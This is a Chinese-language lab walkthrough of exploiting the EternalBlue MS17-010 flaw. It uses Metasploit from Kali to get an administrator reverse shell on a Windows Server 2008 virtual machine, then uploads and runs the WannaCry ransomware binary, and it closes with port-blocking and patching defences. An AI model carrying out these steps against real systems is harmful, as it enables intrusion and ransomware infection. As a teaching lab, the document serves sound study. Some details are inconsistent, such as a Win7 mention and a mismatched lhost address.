永恒之蓝漏洞利用(ms17_010)
1.实验环境搭建
攻击机: Kali-linux IP:192.168.132.128
受害主机: Windows Server 2008 IP:192.168.136.132
实验工具:
metasploit
MS17-010
切记、切记、切记:实验复现过程中必须在虚拟机中完成
第一步: 创建虚拟机并安装 Windows Server 2008
创建虚拟机并安装 kali-linux
Windows设置开启445端口,同时关闭防火墙,同时开放445端口
Windows server查看端口开放命令 netstat-nao
第二部 确定网络能互相通信
从kali-linux ping通windows server 2008确保子一个局域网内
第三步 kali利用ms17-010漏洞反弹shell
(1)用nmap 192.168.136.132查看445端口
(2)打开msfconsole,查询ms17-010并利用
用 search ms17_010 搜索
设置payload
set rhosts 192.168.136.132 受害机IP地址
set lhost 192.168.136.128 攻击的IP地址
设置成功后,直接exploit或run都可以
成功之后的界面
第四步 成功获取Win7系统管理员权限
getuid
就可以使用pwd ls dir等等命令
查看当前路径
第五步上传勒索病毒至Windows server2008系统
上传病毒之前需要弄个快照,防止系统损坏,从新安装
上传勒索病毒
在windows server 2008也可以查看
第六步运行勒索病毒
.\wcry.exe
运行病毒程序后win2008显示
二 防御措施
1、勒索软件防御常见的措施如下:
开启系统防火墙
关闭445、139等端口连接
开启系统自动更新,下载并更新补丁,及时修复漏洞
安装安全软件,开启主动防御进行拦截查杀
如非服务需要,建议把高危漏洞的端口都关闭,比如138、139、445、3389等
2、由于WannaCry勒索病毒主要通过445端口入侵计算机,关闭的方法如下:
控制面板–>windows防火墙—>高级选项–>入站规则
新建规则–>选择端口–>指定端口号445
选择阻止连接–>配置文件全选–>规则名称–>成功关闭